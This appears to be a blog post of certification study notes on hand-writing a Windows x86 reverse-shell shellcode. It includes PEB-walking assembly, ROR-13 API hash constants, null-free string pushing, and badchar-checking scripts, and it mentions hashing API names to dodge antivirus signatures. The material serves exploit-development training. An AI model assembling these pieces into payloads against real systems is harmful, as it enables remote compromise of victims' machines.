OSED Notes: Writing Custom Shellcode From Scratch

I'm working through OSED right now, and the single biggest wall most people hit is learning to stop reaching for msfvenom. The course expects you to write your own shellcode: bytes that survive your bad-character filter, fit in your buffer, and don't rely on a single import the loader has to fix up.

This post is the lab notebook version of how I build a working cmd.exe reverse shell for Windows x86 from scratch. The final shellcode in this post is ~280 bytes, has no null bytes, no 0x0a, no 0x0d, and resolves every API by hash at runtime.

The constraints

Before any byte gets written, define the contract:

Listing — constraints.txt

\x20, \x25, \x26, \x2b, \x3d are the kind of badchars you find in URL- or HTTP-decoded buffers. We bake the constraints into the egg.

The plan in pictures

A reverse shell on Windows is six API calls in a trench coat. Here's the flow:

Fig. 1. Reverse shell control flow. Each box is one resolved-by-hash Win32 API.

Walking the PEB

The first thing position-independent shellcode has to do on Windows is find a base address. We can't call kernel32.dll!LoadLibraryA if we don't even know where kernel32.dll is loaded.

Every running process has a Process Environment Block. On x86 it's at fs:[0x30], and chasing pointers from there gets us a doubly-linked list of loaded modules. The third entry in InMemoryOrderModuleList is kernel32.dll.

; nasm syntax
xor    eax, eax              ; eax = 0
mov    eax, [fs:eax + 0x30]  ; PEB
mov    eax, [eax + 0x0c]     ; PEB_LDR_DATA
mov    eax, [eax + 0x14]     ; InMemoryOrderModuleList.Flink
mov    eax, [eax]            ; ntdll
mov    eax, [eax]            ; kernel32 entry
mov    ebx, [eax + 0x10]     ; ebx = kernel32 base address

The offsets here are stable across modern Windows. They're documented in winternl.h, and yes, they break on WoW64 in nasty ways — but for plain x86 user-mode they hold.
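To see where 0x0c, 0x14 and 0x10 come from, here's a minimal sketch that models the 32-bit layouts with ctypes and prints the offsets. The struct definitions are my own trimmed-down versions: field names follow the public ntdll symbols, pointers are modeled as 32-bit integers, and everything past DllBase is left out. Treat it as an illustration, not a complete definition.

```python
import ctypes

class LIST_ENTRY32(ctypes.Structure):
    # Doubly-linked list node with 32-bit pointers
    _fields_ = [("Flink", ctypes.c_uint32), ("Blink", ctypes.c_uint32)]

class PEB_LDR_DATA32(ctypes.Structure):
    _fields_ = [
        ("Length", ctypes.c_uint32),
        ("Initialized", ctypes.c_uint8),   # BOOLEAN, followed by 3 padding bytes
        ("SsHandle", ctypes.c_uint32),
        ("InLoadOrderModuleList", LIST_ENTRY32),
        ("InMemoryOrderModuleList", LIST_ENTRY32),
        ("InInitializationOrderModuleList", LIST_ENTRY32),
    ]

class LDR_DATA_TABLE_ENTRY32(ctypes.Structure):
    # Truncated on purpose: only the fields up to DllBase are modeled
    _fields_ = [
        ("InLoadOrderLinks", LIST_ENTRY32),
        ("InMemoryOrderLinks", LIST_ENTRY32),
        ("InInitializationOrderLinks", LIST_ENTRY32),
        ("DllBase", ctypes.c_uint32),
    ]

ldr_list = PEB_LDR_DATA32.InMemoryOrderModuleList.offset
links = LDR_DATA_TABLE_ENTRY32.InMemoryOrderLinks.offset
dll_base = LDR_DATA_TABLE_ENTRY32.DllBase.offset

# The list pointers land on InMemoryOrderLinks, not on the start of the
# entry, so DllBase is reached relative to that field.
dll_base_from_links = dll_base - links

print(hex(ldr_list), hex(links), hex(dll_base), hex(dll_base_from_links))
```

The last value is the 0x10 used in the final mov: DllBase sits at 0x18 in the entry, but the pointer we hold already points 0x08 bytes into it.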

Resolving APIs by hash

We don't want a literal string "LoadLibraryA" in our shellcode for two reasons: (1) readable API names are exactly the bytes AV signatures key on, and (2) we'd have to push every name on the stack, null-free, anyway. So instead we hash. The classic algorithm is ROR-13 with a running sum:

def ror13(name: bytes) -> int:
    h = 0
    for c in name:
        h = ((h >> 13) | (h << (32 - 13))) & 0xFFFFFFFF
        h = (h + c) & 0xFFFFFFFF
    return h

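Run that against every API you need and bake the 4-byte hash into your shellcode. Then at runtime the shellcode walks the export directory of kernel32.dll (and later ws2_32.dll), hashes each exported name, and compares it against the hash you embedded. The index of the matching name leads, via the ordinal table, to the function's address.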

LoadLibraryA   -> 0xEC0E4E8E
GetProcAddress -> 0x7C0DFCAA
WSAStartup     -> 0x3BFCEDCB
WSASocketA     -> 0xADF509D9
connect        -> 0x60AAF9EC
CreateProcessA -> 0x16B3FE72
ExitProcess    -> 0x73E2D87E
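To double-check hash constants before baking them in, here's a small sketch that recomputes them and mimics the runtime lookup in Python. ror13 is repeated so the block runs on its own. EXPORTS is a made-up, shortened stand-in for a real export name table, and resolve_by_hash is a hypothetical helper name, not something from the course material.

```python
def ror13(name: bytes) -> int:
    """ROR-13 running-sum hash over the bare export name (no terminator)."""
    h = 0
    for c in name:
        h = ((h >> 13) | (h << 19)) & 0xFFFFFFFF  # rotate right by 13
        h = (h + c) & 0xFFFFFFFF
    return h

# Assumption: a tiny fake name table standing in for a module's exports
EXPORTS = [b"accept", b"bind", b"closesocket", b"connect", b"listen"]

def resolve_by_hash(names, wanted):
    """Return the index of the first name whose hash matches, else None."""
    for index, name in enumerate(names):
        if ror13(name) == wanted:
            return index
    return None

for name in EXPORTS:
    print(f"{name.decode():<12} -> 0x{ror13(name):08X}")

index = resolve_by_hash(EXPORTS, 0x60AAF9EC)
print(index, EXPORTS[index])  # 3 b'connect'
```

One thing to watch: Metasploit's block_api uses a different scheme that also folds the module name into the hash, so its constants are not interchangeable with the output of ror13 here.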

Pitfall I keep hitting: be careful which DLL exports each function. connect lives in ws2_32.dll, not kernel32.dll. Your hash-walker has to scan the right module — that's why the first job after PEB walk is LoadLibraryA("ws2_32").

Stack-pushing strings without nulls

"ws2_32" is 6 chars, 7 bytes with its terminator, so it doesn't split into clean DWORDs. We need a null terminator on the stack but no nulls in the shellcode itself. Trick: push the string back to front as DWORDs, and build the short tail in a register that was zeroed with XOR, so the terminator and padding never appear as immediates:

xor    eax, eax
mov    ax, 0x3233          ; eax = 0x00003233 -> bytes "32\0\0" in memory
push   eax                 ; tail of the string + null terminator
push   0x5f327377          ; "ws2_"
push   esp                 ; pointer to "ws2_32", the argument for LoadLibraryA

The string goes on back to front because the stack grows down, and the only zero bytes come from the register. The point is: never let \x00 show up in the bytes you actually emit.
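Working out the DWORDs by hand is where I make most of my typos, so here's a rough helper that does the splitting. push_plan is a hypothetical name of my own. It only tells you which values to push and which ones contain a zero byte, and it checks for nulls only, not the rest of the badchar set.

```python
import struct

def push_plan(text: bytes):
    """Return (dword, has_null) pairs in push order for a null-terminated string."""
    data = text + b"\x00"                # the terminator the API expects
    data += b"\x00" * (-len(data) % 4)   # pad up to a DWORD boundary
    chunks = [data[i:i + 4] for i in range(0, len(data), 4)]
    plan = []
    for chunk in reversed(chunks):       # the end of the string is pushed first
        value = struct.unpack("<I", chunk)[0]  # little-endian, as x86 stores it
        plan.append((value, b"\x00" in chunk))
    return plan

for value, has_null in push_plan(b"ws2_32"):
    note = "build in a zeroed register" if has_null else "push imm32"
    print(f"0x{value:08x}  {note}")
# 0x00003233  build in a zeroed register
# 0x5f327377  push imm32
```

Any DWORD flagged as containing a null is one you cannot emit as an immediate, which is exactly where the register trick comes in.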

The annotated final blob

After assembly + encoding, here's a slice of the final shellcode (truncated; full file in the repo):

Listing — shellcode.bin (slice)

I verify it survives my badchar set with a one-liner:

python3 -c "import sys; bad=b'\\x00\\x0a\\x0d\\x20\\x25\\x26\\x2b\\x3d'; \
  data=open('shellcode.bin','rb').read(); \
  print('CLEAN' if not any(b in data for b in bad) else 'DIRTY: %r' % \
  [hex(b) for b in data if b in bad])"
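When the one-liner says DIRTY, I usually want to know where the offending bytes are, not just which ones. A slightly longer sketch of the same check, reporting offsets. find_badchars is a hypothetical helper name, and the sample bytes are made up for the demo rather than taken from the real blob.

```python
# Same badchar set as the one-liner above
BADCHARS = bytes([0x00, 0x0A, 0x0D, 0x20, 0x25, 0x26, 0x2B, 0x3D])

def find_badchars(data: bytes, bad: bytes = BADCHARS):
    """Return (offset, byte) for every bad byte found in data."""
    return [(offset, byte) for offset, byte in enumerate(data) if byte in bad]

# Assumption: an invented 8-byte sample with one 0x0a planted at offset 6
sample = bytes.fromhex("31c0648b40300a90")

hits = find_badchars(sample)
if hits:
    for offset, byte in hits:
        print(f"DIRTY: 0x{byte:02x} at offset {offset}")
else:
    print("CLEAN")
# DIRTY: 0x0a at offset 6
```

To run it against the real thing, swap sample for open('shellcode.bin', 'rb').read().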

Then I plug it into a tiny C harness and watch nc on my attacker box light up:

Listing — attacker@kali

Things OSED candidates burn time on

A list of mistakes I made so you don't have to:

Forgetting that stale stack contents matter for some APIs. WSASocketA returns INVALID_SOCKET with WSAEFAULT if its lpProtocolInfo argument (an LPWSAPROTOCOL_INFOA) is neither NULL nor a valid pointer. Push 0s for the arguments you don't use; don't trust whatever was on the stack.
Hashing with the wrong case. Windows export names are case-sensitive, so loadlibrarya and LoadLibraryA hash differently. Use the exact string from dumpbin /exports.
Embedding a null byte in your hash table. 0x00ABCDEF will tank your shellcode. Re-roll the hash function (different rotation count) or alphabet-pad the API name until the hash has no zero byte.
CreateProcessA's STARTUPINFOA is 0x44 bytes on x86. Zero all of it, then patch the fields you need: cb = 0x44, dwFlags = 0x100 (STARTF_USESTDHANDLES), and hStdInput, hStdOutput, and hStdError = socket.
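For the STARTUPINFO item, it helps to have the field offsets written down before touching assembly. Here's a minimal sketch that models the x86 layout with ctypes. STARTUPINFOA32 and build_startupinfo are names I made up, pointers and handles are modeled as 32-bit integers, and the socket value in the demo is a placeholder.

```python
import ctypes

u32, u16 = ctypes.c_uint32, ctypes.c_uint16

class STARTUPINFOA32(ctypes.Structure):
    # x86 layout of STARTUPINFOA, with pointers and handles as 32-bit ints
    _fields_ = [
        ("cb", u32), ("lpReserved", u32), ("lpDesktop", u32), ("lpTitle", u32),
        ("dwX", u32), ("dwY", u32), ("dwXSize", u32), ("dwYSize", u32),
        ("dwXCountChars", u32), ("dwYCountChars", u32),
        ("dwFillAttribute", u32), ("dwFlags", u32),
        ("wShowWindow", u16), ("cbReserved2", u16), ("lpReserved2", u32),
        ("hStdInput", u32), ("hStdOutput", u32), ("hStdError", u32),
    ]

STARTF_USESTDHANDLES = 0x00000100

def build_startupinfo(sock_handle: int) -> STARTUPINFOA32:
    si = STARTUPINFOA32()              # ctypes zero-initializes the struct
    si.cb = ctypes.sizeof(si)
    si.dwFlags = STARTF_USESTDHANDLES
    si.hStdInput = si.hStdOutput = si.hStdError = sock_handle
    return si

si = build_startupinfo(0x1234)         # 0x1234 is a placeholder socket value
print(hex(ctypes.sizeof(si)))
for field in ("cb", "dwFlags", "hStdInput", "hStdOutput", "hStdError"):
    print(f"{field:<10} +0x{getattr(STARTUPINFOA32, field).offset:02x}")
```

The offsets it prints are the displacements to use when patching the zeroed buffer on the stack.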

Wrapping up

OSED doesn't reward speed — it rewards understanding. Every piece of "magic" in your shellcode should be something you can explain. If you're staring at a hash table and you don't know which DLL each function comes from, stop coding and read winternl.h for an hour. Future you will thank past you.

I'll publish the full reusable assembly source + encoder in a follow-up post. In the meantime, the Active Directory attack-paths post shows what you do after the shellcode lands.